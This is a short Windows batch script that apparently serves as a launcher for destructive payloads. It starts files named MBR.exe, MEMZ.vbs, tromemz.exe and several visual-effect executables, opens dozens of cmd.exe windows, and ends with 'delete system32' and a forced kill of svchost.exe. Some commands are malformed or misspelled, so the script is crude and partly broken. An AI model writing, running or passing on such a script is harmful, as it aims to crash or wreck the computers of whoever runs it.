@echo out

echo your compter is
echo ...
timeout 2
start cmd.exe
timeout 3
start MBR.exe
start Mem.vbs
start bytebeat1.exe
timeout 1
start circle.exe
start sinewaves.exe
timeout 9
start Bitblt1.exe
start MEMZ.vbs
start tromemz.exe
start circle.exe
start sinewaves.exe
start Bitblt1.exe
timeout 1
start cmd.exe
start mem.vbs
start simewaves.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start yuoy.vbs
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start computer.vbs
start cmd.exe
start cmd.exe
start cmd.exe
echo goodbye
timeout 1
delete system32
taskkill /f /im svchost.exe
exit
